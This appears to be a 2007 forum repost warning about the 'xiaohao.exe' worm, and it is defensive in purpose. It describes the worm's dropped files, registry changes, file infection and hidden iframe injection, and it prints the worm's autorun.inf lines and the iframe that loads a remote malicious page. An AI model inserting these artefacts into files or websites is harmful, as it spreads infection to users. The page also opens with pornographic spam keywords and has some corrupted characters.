影音先锋男人资源av站_狠狠色综合激情丁香五月_爱爱爱爱看视频_在线播放免费人成视频在线观看_少妇人妻综合久久中文字幕_国产午夜无码精品免费看_久久久久久夜精品精品免费啦_男人女人午夜视频免费_日本xxxx裸体xxxx_丰满人妻熟妇乱又仑精品

電子科大論壇-非清水河畔

標題: 警惕惡性蠕蟲病毒"xiaohao.exe"(浩字病毒）！ [打印本頁]

作者: holly0708 時間: 2007-9-13 11:03
標題: 警惕惡性蠕蟲病毒"xiaohao.exe"(浩字病毒）！
File: C:\Documents and Settings\Administrator\桌面\xiaohao.exe
Size: 12288 bytes
File Version: 1, 0, 0, 1
Modified: 2007年8月14日, 21:03:22
MD5: B50ED06B61CDCF060D0136784999E50C
SHA1: ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD
CRC32: 5CC1E47A
加殼方式:UPX
病毒運行后：
1.生成如下文件：
%SystemRoot%\system32\exloroe.exe
每個分區(qū)下生成一個xiaohao.exe 和autorun.inf
autorun.inf內(nèi)容
[Autorun]
open=Xiaohao.exe
shellexecute=Xiaohao.exe
shell\Auto\command=Xiaohao.exe
2.添加注冊表項目
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
指向 %SystemRoot%\system32\exloroe.exe達到開機啟動目的
3.修改注冊表鍵值HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue為0x00000000
破壞顯示隱藏文件
刪除HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2
從而刪除開始菜單中所有的快捷方式
4.感染文件
從系統(tǒng)盤開始查找所有*.exe的文件將自身病毒體寫入到正常文件中，被感染后的文件圖標為一個表示有“浩”字的圖標，病毒采取覆蓋感染的方式，被感染的
exe無法修復
從系統(tǒng)盤開始查找所有*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 在其尾部加入代碼
<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>
所有感染的文件的文件名記錄在C:\Jilu.txt里面
并將所有未能感染的文件屬性變?yōu)殡[藏
5.病毒運行時，所有窗口標題變?yōu)椤耙阎卸荆琗14o-H4o's Virus”
6.系統(tǒng)時間改為2005年1月17日
病毒作者將其QQ號碼和博客公布于互聯(lián)網(wǎng)上，以此炫耀自己的技術。作者的行為和原先的兔子病毒很相像，為了炫耀。
由于病毒感染所有exe文件所以重啟以后可能會造成ntoskrnl.exe，ntkrnlpa.exe等核心啟動文件被修改從而造成系統(tǒng)啟動失敗
如果中了此類病毒那么幾乎等于判了死刑必須重裝系統(tǒng) 而且要將其他盤里面所有的*.exe,*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 文件刪掉
希望大家注意如下幾點防范此類病毒
1.安裝還原精靈、冰點還原、雨過天晴等還原軟件（沒裝還軟軟件的參考下兩條）
2.及時升級殺毒軟件，防火墻，一定打全系統(tǒng)補丁
3.禁用U盤等移動設備的自動播放功能：在“開始”菜單的“運行”框中運行“gpedit.msc”命令，在“組策略”找到“計算機配置”和“用戶配置”下的“管理模板”功能，打開其中的“系統(tǒng)”菜單中的“關閉自動播放”的設置，在其屬性里面選擇“已啟用”，接著選擇“所有驅(qū)動器”，最后確定保存即可。
======摘自卡卡社區(qū)

歡迎光臨電子科大論壇-非清水河畔 (http://www.hallmarkedu.com/)